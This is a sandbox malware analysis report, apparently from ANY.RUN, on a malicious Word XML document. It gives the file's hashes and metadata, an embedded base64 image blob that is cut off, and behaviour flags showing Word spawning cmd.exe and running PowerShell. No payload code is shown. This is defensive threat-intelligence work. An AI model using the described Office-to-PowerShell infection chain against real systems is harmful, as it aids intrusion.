analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

p3254.doc

Full analysis: https://app.any.run/tasks/6edf1a7c-1051-411f-98ad-77580965f89e
Verdict: Malicious activity
Analysis date: January 23, 2019, 06:52:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

D72ECFDC037F0690D92469B872D91CBF

SHA1:

2FD5CDB9C98E2D0D1735FD82BD5F2C4CB9680F51

SHA256:

04FDDDD6666A067D6940502369C1CC32D319D83341AC0087444D67B01FD2A326

SSDEEP:

1536:EYY8ZkGRCIijExMlhJx+lpoXraQECsMaUhP5hTl:tyEQDx+DOac/Tl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2960)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2960)

    • Runs app for hidden code execution

      • cmd.exe (PID: 2748)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2708)

  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 1144)
      • cmd.exe (PID: 2748)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2748)
      • cmd.exe (PID: 1144)

    • Creates files in the user directory

      • powershell.exe (PID: 3132)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2960)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2960)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidSect: 00E57080
WordDocumentBodySectSectPrRsidRPr: 00D965B0
WordDocumentBodySectSectPrRsidR: 00E57080
WordDocumentBodySectPRsidP: 00D965B0
WordDocumentBodySectPRsidRDefault: 00E57080
WordDocumentBodySectPRsidRPr: 00D965B0
WordDocumentBodySectPRsidR: 00E57080
WordDocumentBodySectTblTrTcPRRPrRFontsHint: fareast
WordDocumentBodySectTblTrTcPRRsidR: 00D965B0
WordDocumentBodySectTblTrTcPPPrRPrRFontsCs: Courier New
WordDocumentBodySectTblTrTcTcPrTcBordersRightColor: auto
WordDocumentBodySectTblTrTcTcPrTcBordersRightSpace: -
WordDocumentBodySectTblTrTcTcPrTcBordersRightBdrwidth: 20
WordDocumentBodySectTblTrTcTcPrTcBordersRightSz: 8
WordDocumentBodySectTblTrTcTcPrTcBordersBottomColor: auto
WordDocumentBodySectTblTrTcTcPrTcBordersBottomSpace: -
WordDocumentBodySectTblTrTcTcPrTcBordersBottomBdrwidth: 20
WordDocumentBodySectTblTrTcTcPrTcBordersBottomSz: 8
WordDocumentBodySectTblTrTcTcPrTcBordersLeftColor: auto
WordDocumentBodySectTblTrTcTcPrTcBordersLeftSpace: -
WordDocumentBodySectTblTrTcTcPrTcBordersLeftBdrwidth: 20
WordDocumentBodySectTblTrTcTcPrTcBordersLeftSz: 8
WordDocumentBodySectTblTrTcTcPrTcBordersTopColor: auto
WordDocumentBodySectTblTrTcTcPrTcBordersTopSpace: -
WordDocumentBodySectTblTrTcTcPrTcBordersTopBdrwidth: 20
WordDocumentBodySectTblTrTcTcPrTcBordersTopSz: 8
WordDocumentBodySectTblTrTcPAllowEmptyCollapse: -
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrSz-csVal: 36
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrSzVal: 36
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrColorVal: 000000
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrB-cs: -
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrB: -
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrFontVal: Times New Roman
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrRFontsH-ansi: Times New Roman
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrRFontsFareast: Times New Roman
WordDocumentBodySectTblTrTcTblTrTcPPPrRPrRFontsAscii: Times New Roman
WordDocumentBodySectTblTrTcTblTrTcPPPrJcVal: center
WordDocumentBodySectTblTrTcTblTrTcPPPrSpacingLine-rule: auto
WordDocumentBodySectTblTrTcTblTrTcPPPrSpacingLine: 240
WordDocumentBodySectTblTrTcTblTrTcPPPrSpacingAfter: -
WordDocumentBodySectTblTrTcTblTrTcPPPrFramePrY: -1313
WordDocumentBodySectTblTrTcTblTrTcPPPrFramePrX-align: center
WordDocumentBodySectTblTrTcTblTrTcPPPrFramePrHanchor: margin
WordDocumentBodySectTblTrTcTblTrTcPPPrFramePrWrap: around
WordDocumentBodySectTblTrTcTblTrTcPPPrFramePrHspace: 180
WordDocumentBodySectTblTrTcTblTrTcPRsidP: 002406E4
WordDocumentBodySectTblTrTcTblTrTcPRsidRDefault: 00D965B0
WordDocumentBodySectTblTrTcTblTrTcPRsidRPr: 00D965B0
WordDocumentBodySectTblTrTcTblTrTcPRsidR: 00D965B0
WordDocumentBodySectTblTrTcTblTrTcTcPrVAlignVal: bottom
WordDocumentBodySectTblTrTcTblTrTcTcPrNoWrap: -
WordDocumentBodySectTblTrTcTblTrTcTcPrShdFill: auto
WordDocumentBodySectTblTrTcTblTrTcTcPrShdColor: auto
WordDocumentBodySectTblTrTcTblTrTcTcPrShdVal: clear
WordDocumentBodySectTblTrTcTblTrTcTcPrTcBordersRightVal: nil
WordDocumentBodySectTblTrTcTblTrTcTcPrTcBordersBottomVal: nil
WordDocumentBodySectTblTrTcTblTrTcTcPrTcBordersLeftVal: nil
WordDocumentBodySectTblTrTcTblTrTcTcPrTcBordersTopVal: nil
WordDocumentBodySectTblTrTcTblTrTcTcPrTcWType: dxa
WordDocumentBodySectTblTrTcTblTrTcTcPrTcWW: 1068
WordDocumentBodySectTblTrTcTblTrTrPrTblCellSpacingType: dxa
WordDocumentBodySectTblTrTcTblTrTrPrTblCellSpacingW: -
WordDocumentBodySectTblTrTcTblTrTrPrTrHeightVal: 242
WordDocumentBodySectTblTrTcTblTrRsidTr: 00DF38CC
WordDocumentBodySectTblTrTcTblTrRsidRPr: 002406E4
WordDocumentBodySectTblTrTcTblTrRsidR: 00D965B0
WordDocumentBodySectTblTrTcTblTblGridGridColW: 1068
WordDocumentBodySectTblTrTcTblTblPrTblLookVal: 04A0
WordDocumentBodySectTblTrTcTblTblPrTblCellMarRightType: dxa
WordDocumentBodySectTblTrTcTblTblPrTblCellMarRightW: -
WordDocumentBodySectTblTrTcTblTblPrTblCellMarLeftType: dxa
WordDocumentBodySectTblTrTcTblTblPrTblCellMarLeftW: -
WordDocumentBodySectTblTrTcTblTblPrTblCellSpacingType: dxa
WordDocumentBodySectTblTrTcTblTblPrTblCellSpacingW: -
WordDocumentBodySectTblTrTcTblTblPrTblWType: dxa
WordDocumentBodySectTblTrTcTblTblPrTblWW: 1068
WordDocumentBodySectTblTrTcPRPictShapeImagedataTitle: -
WordDocumentBodySectTblTrTcPRPictShapeImagedataSrc: wordml://03000001.png
WordDocumentBodySectTblTrTcPRPictShapeStyle: position:absolute;margin-left:39.75pt;margin-top:3.75pt;width:484.5pt;height:60pt;z-index:2;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text
WordDocumentBodySectTblTrTcPRPictShapeType: #_x0000_t75
WordDocumentBodySectTblTrTcPRPictShapeSpid: _x0000_s1028
WordDocumentBodySectTblTrTcPRPictShapeId: Picture 4
WordDocumentBodySectTblTrTcPRPictBinData: iVBORw0KGgoAAAANSUhEUgAAAoQAAABPCAIAAAD9ZUNGAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAALMxJREFU eF7tXVtoFEkXLu+3rKtscHfRXfIvLsvKsiIowgoiy8IiCOZBEGFBBB8UHyLig+KDIoIECUgQQcyD KPqgiKAoiAYMCt7AKEYlXhOMmpBoLmNiYi79f9U1U1NdXd1d3TMmE3OaoDM1p06d+upUnapTp6oZ o4cQIAQIAUKAECAERg4Bx3F44fiPHkKAECAECAFCgBAYTgSk9SdjPJywU1mEACFACBAChEAWATLG pA2EACFACBAChMAII0DGeIQbgIonBAgBQoAQIATIGJMOEAKEACFACBACI4wAGeMRbgAqnhAgBAgB QoAQIGNMOkAIEAKEACFACIwwAmSMR7gBqHhCgBAgBAgBQoCM8ZfVgeaKi1+2AOJOCEQi0D0QSZI3 go/9eWNFjAiBsYTAqDTGb/afi7yfZDcrnjuMd5isZuPaj9/wa47AdyxpVE517b5UN0YQa6+4whVj 0HH6+W07Hy88UIFDykQLtUmdq72/YocRcXDYxCaInzazCbGUsO7f3YlbMUHzrWMT8WfsO3eWliWW xDLjJMa+BdSv2izpY5EBjbatp5EFH3aymTZ5Ww9fdV6321COEZojU+fXl+6PW1lo/EzGhl5+kWaN K4wl/egzxp2n71iOLCC7NGeFFRDtn94duCAo/2Xs2Izf9VzuiDk7dHw0DEN17yxFtRLSS9RSednp TZBPz9K462Qug28eJHBZAKjquSsFN3y+vXRLjpzRD8FnoYVJy7GgZNmltnA7ydjA3cYsnyctXG3c FeapKb9NYQwGA3+gHO/+wU5PZawo03edzj5NhgXeKeA34Nbuoflw7HqI2GW8tISTSGR7t/5oLExQ r9vz//NnCek7+e1WWziiiWbMLz+gFf4KyJvG8E33avdT5bgfrWDp/JwA/FmQoakjiH/l5JLBZy3q r9+5ZSxJVmtvMZg9BCEgu/O1eaus6m4kak4lAAScNrBxCZs1uaw55cx0aK6KCbtfTuXHzxyErzHd sjHOzV6qUkK3/BmR0rY/wues5cK42XfxcfwqWuXA+IXiDrIfrKhDiX5x63vzf2tzZxXJAQXNYKz9 xE3j4AsjEMkhkqD75jPM2ORAYJhaRbKwI2g/ePXJ0h13f9ugrWsjc7/8Zx9XFZjbQd7rjrI5apbf GOs+yI3lo183RbIyENxpAs/zbG7/6breqrv9px7iK/7t2nelZeOx16UHRZ+vXb49hDkILk76LW7p r5e79TI9IeMpFqYv/t4rM/2U4RDSeS9//7dl17apQuvmEzbcRBXOFy2Ey019fjZW+TGfUT0o5kbI 7aezbSQRND8wVhyzI8xyBQpvUI0AX1t2n7WXKhZzlbjvxouQ1rcRoH1HtCvUwMddQdnwLxAaqVRC Zwpd9MmMrfMKCQeXWgcN1vt/bLap1K1f1oGzmtevPX4+z8qOVE3/7eqP/z74c0vj6oq2slO/Q783 HW9YWf5s+e7L33ID37yhCj/h6+Ml2wXPT3df5avtc1Rxrb7O53zJFcFHjKQb2RQ/nU1j2Uj5T9TY ZMMkiAYtDvY35vB/jzO+3Gndc+57t8SX6yttOPNqtnG3Bj4cYcUyS6k7aq9QrNGZ8SX4FStd7tD2 PoM1L40bMWbVbe4JF+xHVf8/uaPYx6FDjK+g5hmHhb4h2e/Qd0oYgxHFg5nWMsaABhb0mIxibYJ/ sfblixTG3pafF2JgF+l40QLM/56v2IPG2seKXv27H5/RZ2CH7s5bI8AJNwDZX4ccFHHlh38eLizD RAcd8E+3OGwe2TRHT+UNyKBTmva+wXMlKDvd3wRK7z4ai5AtC0kq2KxwMfaN/0FOH0XFMZGqm7/B 35RBfED55PfN8tdLM5dUTeSaIx+s4E9Mnq+mhMNrg5uk4aw6snjtYtNadp1ROYjeYcPzwTqDR/rz ifvrZfbuQQwf0C4bbovtmtWG1TDQyA4ldMCqhsMgVojOGX/iJjd4Sj5w73W4zLCmUFYPjW9WZeY/ jJExehXaevPYXmZWfc4XcvN2nb2XR+GNjQsnlVxj5VFj+SA74SfBcLlP65AAqxBe3IGJ81B90Lwv v7TeZy3AYZXLAcNNzYzFghUSL09Z0L7zPDzATWsq8S/WCucmcI+GVhZS9vi8c5zsQ2asrH1rRP5E 0R9iLIDtxINp5aXJv2MeaQ9dZ9nZ/Laph5t3LnLv943+sjClhhlemxnSyllx38OmaPnvveG8GMPA jX2o7NTeTUR4iplDapALoFgglezagv+kGVgTpQ88Y1dfRmr+P8aiCjYd83jn/ado+R2n53Qtci1i DJM2tKJw7OEBIDI7NlDr/9qpcstXY4kZmygdwwXmUuLpufxIFodETJJs6vJ0y2HkhasSnm0speDI 6a6o2eoyxJxPPPCfbWUzwrn1X312bTqE4pqMuovNIPk07fXMFWwEGwYaKZ7o8gVtjKFnhpmOC9L7 bWeChMc8PbJedYt4c+twd3i2ZAOZPPPECHTsSu8969zqW7XOkGPripbLkYnMzlk9bm3ZWAXFFQ/6 VVY5eofyVZANHzixLavWuPkoKBH2Jdimrtd7nNJvOm2Ks6dBWW+3n1RBy07YM6mgmZ9bu2ARiXXw dIVJEBpaOv/qLtr4hwetTnUD/6vje+fNS/bic9+xe6kD1a1bslUw1P11Cisye0w8KhQz2+mpGCrT ZcFTzT+7iobV5yZX+fDzCncZpNUUFk5tiGyxqYEgrG4t5jN2TNGwdpcPagpP/jn2Iwryyz5Q3+y0 dRvrJKGOWeNockvNVxkhCxxyWorwLsgHBh7OOY0mWhoLCi6w6kXo5i4Tp6lLzYqdiHij35CD3Z+n y3ZhRvLp8C04FTGMG2VBAKO/WbFJj00ZaLvH3yPz9wxioLCo2XCTZMfbwjfGkBWOLCNC2AwLUuLU sVuR+j1Yy7fZwrDvDXSaISM2+X51Bw7MFVzNSLNCB0BsiGALySPFCBKg72Ur8qKIT1efpGnExNz0 9NY28p3XlMfLtplNfbb2gCRHXoSTIMhWTGPFtJHvU3pdc0icppXSpccKWSrsy+28gWzi6bov8j1O S7ZOnzuFVOgf/L0TXz8cuGzg0JKyZWuig4Uo8QrGyzXhEUP+AIEweGnj5pO563qP3sGCGKqOPU7M +c5PhNHPkvHPbWlftCaALk/o4aOQlT30CqPbwFNPKJCQU2g+FuXw98IhgSUm/kCstY5WXX9LcSWZ nA6f1GunZDYi3Huvgfvzgx++bySCzFMej9bQxWel9ion5jpdX8QnBiviNJm1FLqHpnm6plyrH0L5 NDSuTuVOeo0MU5BHi7dpSmWEqpSN9we3Y45uDDhHQTu8+01zfPKgFIyEWunxeuKl57DHQVnEcstt Vl2z0eLxChpR6kx34TLrjTqighkKDxnj3qzjzo0ggUN+Uu1TSH2xoRXEREuH6xLuRMEK45GcPcBL g/6QE6SNH7a6Ya5135fCiJZ5uX288TTLvKlDkwqOeqTsz2xPwjDjK1YJMh5br92Avp0pmNsgKSix ZYWtHU99e/gEgnP4FLjO7rny2L4IMMd2ppHeP0aA+O5fW23jYrr64e3UNoC1ghpXcQyNDYp0bF4m buvB8/VOOx9W4DHOwt5mMPvi2Iz/gQBb3Ekh/i13Pa8Y5bEwRItwz10AaOADm3qjaGnjsr1boRve xY3jRiTh8e9cVE9Lu1H8kmD2gNHZKCRUWR6+yhK081hiv7JpUMdSkrCGaOuFQxjuDXRby/ZC0Rj9 ASyyYMNCfHXyYZoxweLb8w2dMCH9l/WlGwYTf8PxsAWf5EhBQINWHdhsbMapiVpG1XPr9yaK0H2n sV3joIXapIeIBg8ZEuHmidUjTs1c6LRkN+MxW9pm3UBcwjepnWwC3NRwplo2ayGQZVp4lBtjbKSF 9E+brhtOgwCToHFcy4iVQeeeS6JpMQxhyBafYc71bemk7S+iIVI7PKHdLQcvIbFx0xHBFV1XLU6s gEMKLFF+RZAwiDsqq/30Ul3sP2hMkNEcfeo4COexaSnJsOvoDU4fcL7LP3KJkSLWs4FNFsV9vvlS kw1fEUpthBRoB/0U3ubYBMZADDc1FiJoQcy3xAQuDBaLpbklqpW8TO4WFkLyXB9c7vXcMYPHuLgR G5ZOG9/19Ncutf+qcececwItvZxX2uWQWd6oDDXmlvE74Whjz/7O3FLQHGXfWh7yEQ7zY94jDPBX IZEvanN5GtpVjd3FJp4alw5NwMk0PDhvprEXMyAtEQEHxobAjEw7P6aRiSMVkhs+qyce8XWWtyyk rDDNA/gmi++Bgy2WMcZmPxdg0VauDHUt6AjwFR1m38A7KB5UJwhsnBIUc5GeQzfVvZ5cGmd48mYq N8qNsTiwEQRZyE+q8mnZu6qzAQho+wPsWyN/MEfEBKZgcJGJ0ImuvWkfKdx0EEzkQmhJvowxiqhw l8jcd6Q+r/juoExQ3Yk8/bHBuyiJ5RFqyGzsTpKSR5O25+OAsxdNEXcTS+lBj12lkCwg2O6L2S6N WYrgX7tgk6f5etyNsYAHPyVzynUcuuZ0c7eBbIJX3/MYHIwpJYxdYMUwBmggsR7CXhkSjWJoifxr a7bJBqqfI6X/1itVfHExyNCNBpn49t8KEQKN+BzPMWglW991zkok4AMO22GzBnORWa6cwlpglNdw guXzx9KDEh74LKXrm5FftRoJNz6OAMVSGI04y7PHyuXj1ias0XGGJ5k8iD0G59PjflazI0W4MTBp 8LNFOsLR9XSxm9Zj8DwhXdsk8tcF7WKsoH905VJV1Wilh7gP4xpjwbl552kU/fHANTh17AfPELVJ 1jrDlksomJA/TNWGTaCQgriUAVYgvytj4cXVOobTYj4colHCedWxO71mxXgEwQSffBljFMfNIZ4u Hquyzi+nb+MkclkMZmIF9npLVdeZu8Pf1uHDnFEeZNnIxoeLenY6jxB2ctsqFkUgnIRfnZF5YAwM LtbMr7zQDwnnK3y/vydjjC+7prFjCFOl+mnL8PEa+8lp5O47qXXG0ROJfcdrB889ce42V7EZPDqp rm3gzKNUeTV8oXAdY9dZnZylL9J58T6L5yO+Gg6flrUdvRY58CEQwW+MZSnIjgUxvkJaraxbP6xS D51r1RRmWwZkGEGIVGOey12FY2UcySFSRfeyInuDockG5lqAkgjqjqyCn8+2jC9H+2mVN26/68j1 IM3xFwpK9SD40NuOoC6Je+WMP2E2yZe5SR+oLrYSLHPLZj3k3otjmasQyISOCZmTNP9w1gHyBQVw vf3vSBDuqSqr0Fx1dNNm3DhAHNKo2k+YXco9Y/iT5eEQ+KsT91V18JL7iEjE4iZS27DYiqQBq1z3 s5PqgXCJIwIuFgNkKbXLAkosL2IxDyLOwvg5bCEVtLywlEF2RdCLswMPJy3CdOpF0T/4XDvxD6ed n/KRYVbRjfsqdcU9DK09OAfvtGZDhXF4WhLAEmzD2N01ELLl1n7pvla0URKcSwkxxlyHrz5LD0C+ 4MGa4r9VzVflR5sifk2ejE92VwyuasEsB450cZorpIEe/rMrEuemtYciaYKKKGPT5U9wd0fvTZgY yXHcRtNAHDKbVDnMigJHEIMKzpWgolEjLZZbpxxyatdkL37RfoUxhtPFpl6gSZ2/j2aFe1L4dSxz FQKZaEE5AhS06CFX7IbYS8vhGGQ3v+Fu5s7DuvsFiRcm8d0KPn75HqSLiz7whw/4inNWggo6IWeU MMbq0ipB2ye53a2D7+T13876HoPK1T3eCeSLn0Us2c2Rz8HckEWc07V64CfIk1Nddmx80GJhpCRJ 2shbDdkVefKT9hfFa3iMzOH7CJB9MGkhtBBLhCo2GfbyPCvGwK1Khc8w0kAVEwJEbx1gk86x77CJ iN1ZfNjHJmAvQGypyCObRn12Xn6QCmwFcmY4BmeUjlghuNMxiIsdvpKoARGipsegusxOyruPsl6c d1OX56vjaJdI4K7H+lKrY6zm6rhOppCa4qIe9VIOIyUOf4czsUFSHWRicUsDaFMGXC2V1ZbMLS8K BTceDRr8YB0StI5Cpv5Hb8zyfBzgLpBnH3CUwB82aFNXy2rasBoGmkw/GA0rY8ARBC7mQUE/2bSH sLXYGzOOTXMz6UaN1/iDkTzzhyFJjtpYImsGD07sjlO3LdtYHXYts4hb6Cz3scwoBYc9W8qgkcFb JS5gqf0Z/nX+xOWT44QmbnEeejdGPURsOFQS1EgTSXCQfG5PWdi+8rDTkLrK5iKd/9vEt0skQUiJ e9l4DIKNP65HEDU/89MS7Tkv9e44xoqTMkqCLRseIRz89F14JDKmnYruNRpIga9LZvJfV+lvBaRc /7lUL6fxg829H4hc087nhAgsivZPXpFoGQUWxLy3ul5dXNrrEijtfQP9dxpBj4DEyL6AG2miZXAv jo68dhsr46B49d182qZriJimV89ejl2V/pMP+GlF98HoCk9npOSCABef+UNGtLzyWoX+J+8s2X45 skwtR4kx/l+A2vH2NPV5ODfCB5THq/hVA3gMl3W4y0rN94IU/wt21ObBKkTuE+9g3+DUrPgVkQjG Dhyt7pkY4FhK0FR2DJzRvS1zCRCw4MBqHnKKkwziseRgQ4a3DEm2pXnlbFN6fmhMh3RxNBP1uli8 PMcicJHFzR/42zIk7OkPd9/hhBLSD2JH8BHf2dUJfAWDYI1AuK6t0o1iw0DG92VDD8jm0tzGvPAS QakCYWnrUXNhMxuUOD2tnXVGinaWwaiZ4uUH/qfrWsT98Pa1xuFA3PUoqsNziWhzx8GdpvZMgtBI wEHcZGeYhQSU8WYbv4W7t+ZZpKKKy03DyaDwnOat534PYxZcgu3nJhKNpWiJ2MZqXsWDb+7Mw7DB H7lACpEwUn6stuVaJZI4ErHcCaTqCu3K58ibu3BGDlxI5f0k6zNvmFFrIjPa1MhIIwIoeq8ph3dd puLeAFUw/1fjsRa4B/ULNBxn6AH3z4QLiV9xOVwsMCN5GrlhEQ/J8YdIYJxDuPPrev99yLHEMBIj LBni4VRS7qwKgcO90j3b8Q6AdqtrCyMFlpogPmDqKbLgOiFxaBuxe7hXSPRV/kO9J35eEFdNxNkx 9vF42umCXdsVGT73fhJB6+wEVtiv2v3y4CfjEZSmrcd5FFjoY1RjTAhmBWTsOGm4jQdnFiSfEsZw qTsu60aKFhmU48a81n/l+fvIBsJ5YhmCAHvARXVd3HgG71tcvRlawIXiZbLFVUIYDGPcQ7xu3p2W M7qODe/BOWwKBRatfB8h/IoVrSBxKgytq070s7cYeak5sJku9ejXjZpqiTHEf8RZ5YHJkVT7oCqr bOGndEb6VdyiQYVU6f+iW2ukKYzd3jiyxI0NxjldAYdc0frZeq7XcFVc0IjBhX/1ThVbD10Rt9LU /LTazw0Tbfx083+eu+skmWVNJb2Yz9p7v0e6Jal8DwKv96Qv8dDaHdOjWa6a8Zjb5/z6VbjgxJ3A 6oB48ht+9RLel6AyxexKixzcz8TJVf40V+gvIlshf/N9CLobkhfn3uiilovDS4IBhk5/M+OCbr9u Y0Fc4mWCDW88/hu8xWiVu/bA+MWyKCgRvVgFBv7hi9+krxDPXR7xDhXjc3CSfvDJfgooGIa/N5ML 75pYDmzUO2MSx6LiVAL+5FVxIYgBCGCLjS24uINO1gVlx2zUJiZUneLkRZ1yVADZ7qPJGDftOyvP xQbVH6+FAZk9Otjww0CA0xr2WdKU3ttrgzggIDOIM9rg7Owlscv1ZYDWdt96njsf4jDiCOhHSLsH jC+dFDc5iwdadGPhRr/kbUeq5dUl6q/Ywsjvq9f3TzDEbBvjMKq+W/R861FVGLz1EvIbL9r8cm2x hX1z5VfzJPjLFVq4nPuGMJUrXPGsJdvMii79stqSXNq/JCO/ZRnWZKPSGFvXjggJAUKAECAECIFR gAAZ41HQSCQiIUAIEAKEwNeNABnjr7t9qXaEACFACBACowABMsajoJFIREKAECAECIGvGwEyxl93 +1LtCAFCgBAgBEYBAmSMR0EjkYiEACFACBACXzcCZIy/7val2hEChAAhQAiMAgTIGI+CRiIRCQFC gBAgBL5uBMgYf93tS7UjBAgBQoAQGAUIkDEeBY1EIhIChAAhQAh83QiQMf6625dqRwgQAoQAITAK ECBjPAoaKbmIqX6ne8Dp7HNaol9zlryUsZ0Tr0b/+gEY6RfafP0IUw3HPAKj0hi/LT8f+ZKNveO+ D3+reSE0PWqBe/xVSXi9BvIkmvtGqas//ouX+QCNz69a88SX2HgQSL/oJg4qa9iEO0vL/DnAqrni Qjin098ukgRHps6PU2xyWrxDBU/0a3+SlxCWs+/Ba6fxw5fhPSq5vi0/l+DVMnjvExrx6ZryUVnn MSD06DPGeCtipCUWDQcyvJLMshH5a2SwiMw8TWsP4fVqeLT3nFtysyHDS760iqSH9UfNyK69CM+G oU7T7+CV90ky5ilPzR//GTgB46YOvHQL77rPUzkjzIY3YmNHLCHG4Q1LJYb3BUUqNl6wDZqWXWek hscqN5L43rJt4F/OitOU7qttnXo+jdvC+Du+DRwa25H+pVsz3TU6+iKrIAmQpWHj4SB6vK1Se1EP 3jieYF4VxJ+/Vk557bpGhoLEC6oTPoMO3i0YqS1+5m3lFxPkSigkZYuJwOgzxn5l+njhAV6FDauJ iZ9f6e0BkVjwkeVx642ipUiJ9Vqxx0u21y3aeuuXdU5je3i5ZfxlnR5pe07dQ1I6Vz+fSeCts/bC GygH82OMn5UdSSYGXkePh9cz88AIiWYCRAD36LRfVc5Dbzs+3X2VrCyRay1nr4N2Ztbixs2eF/b5 i8ALU/He3wd/buE2Mo5nombG4qDRLWRkR8s+W75biiFdOJEDJddIpYKR9AnATIv9MYPC4xZeyptU CCsQ6G96b+1W6eV7mhPII7I0LN0dt7Iv/9nHs3QPBhXqbyCkbGTjEwupZoQxDhG4t4a/MjJujTyC uUNEAlGT5UpQEGWJi4AcJ5ExN+WIW3IievR57U3jEPp9+SXBbIVPvx8uLLNXvtS52vaKK1IuZDzJ 5tmI+Y9bbiXjHfDzpSdOr3Pn1/XpztZvYLDGK2fq2C3xEnW16F1smk3RYTSDCburzrOjF7LNSdTz UVM0gX1F4o5QNX+u117W+6NpjAtkO+DAemNJ9Atj01BBNFbdu1KXGrqki/3Z7SHuM4UxOE64148x zDmWMFbsGiTMNsQffBLiwZYK+Ay+6dgzbs6Joj9u/m/t02W7ljO2h814vmIPPsOYI++duaWiB4Zj BYLecw9VPfHT5/5mVrwY28O2rffdhrDZDKTawSY0b6iC/UPVfsrUXTLZxAFjNT+ttteEq7+tVV/h jOz3i1d27b1sryFo0IVKRVJVNzewcaoAJ6f8qtU0En97+cHqye9bJP2lmUuqJpao2a/M4ktxG4YP 1u03kgFnmb7SxcWGm4HMNEbZsCKa/CIghxcxFFg1Z34liMVNkxCGWUvB166jN1SeSBm49zpWKQKL C5M86zYzB9dH53R+Fr/i80YVw5YUUj5dfaLmRf/H0C9S/sOH1534gJRFmcSdbAJ8UHEFNtAPmAf3 l9uPhTOHBfUToCLAOlKqVI2nspH0xoJs9BCDtcgrZkJai2MvQ0vx89zNZqmJ/PO7jzKXNmEyVuTZ zxu+s8DEHgSPkL4VHcywv6Ya86MTxAzB0FIDTe1lbKZK37DzhFG2Fd7sLZuO72ffBNXiKJvDXbLe x68tleP4NKn7YnYmYWTYVf1IpsuxiVtyPtktais7BR+GJZ7IgokOpkrYD+LuC/dRdRszIc35ZKN4 NqW//e+ILH2BO9sTz5ttWcBf/L3X0vU19K4Tec/NXnpt3qq7v21AxvYd525/i2kPg09FPvCahMs2 dKPh3mzeXZAT8z/VZSVY2VSNaL4cArIpUYS5D3+5suNy/sNdgqi5+C6WbyCGnqk0XGdj6hnoXy7e GS3ekG7teEG+7UOe2NaT5dY7lP4sVq4taYeeFDKutIFyBhjj3nsNKAIrQvRGrUMi3b+sEfz38/4b vW4TxJ2n70Sg1zMEl77YNR942uIfymuXbw/hgNFZjV0SSizpMcZtZFPk1xNsrl9yzYR37DbspWHl FF7lSED8VVC3J2AM5KY+Vjab3VpgW+TfTKf0w6LpvybA2enoInwRaoau9eO+8T+oPzVX8FpjQY9F JP5mZtb6onxs/XzLuLdHeFyDKutPb/xrj5E4hImQqvXw1aCM0Z3RSwE+Jb6RwTNRdhxsTBT5aOIW ZKRH6a1bPBMdpNz+cbVKjD2R+VEdysN8yIElhsyvSw9CXWGM0X3M0qb6Udw6t02nZtoOs5CeQzed S8/N7dg7lPtWQl6gG8tMMm3FmzWwvxUIQJAPnj1VmPrS/Zpu4SscgCrNx+O3g8aRoI7kdGfsZYZC mCJtYwwp/bdeSSa95+uMBe1wfXT+spCoOrIEgUqJlajm2orXEAHGGEzK2DRYI2xcBSLQoyMAysNT fgkRQJVcaBXW9/gTyxo8wsxvY+NaNh7D7P7R4m3AUzwa29tLsv49I27aRn74RAH8D8uIpAw7rVBM Ssq9q0bZHCcmmyOWZ7mS73TXGbD2sFhYJQsnORZDQUDxcnHeTD7vPiLl8pQFWuun9l+FLfQw6eAj rDbRVGuxjasnU/dZdBnaexFPqyUiThAzjvaDV9V01bsbrnKY0hl1+O48Q3gaAiTfHQiMFd/BYyQM uDUu29u8qtIoRqmL9sXi5dqvcEfrrLr4yQKNDNNBS2N8a/Fm7Ep4Gs5xkBfjj1E/tbLQvv7SsWHB g0tyeNYGqxkwQYl8Ry/jtJPlGEHOQQrKmjcEMsPhKDHGEfUWQQ0y9iRg5A1i8vCXDdJX8/nEfZgN gQ5GaixcLn+/4nhRetAEBxHXqrLCV9jdQPPm/WE7G6+PtkNYfU5AH2pbVwVLCa81Js54queuTNja wcY4nGHc7grfoz8LUg6yHxxvIE96PZrDHhXYAiK//L33zd7L1S6GGj0aVNvJDqryPoYh11DcITf9 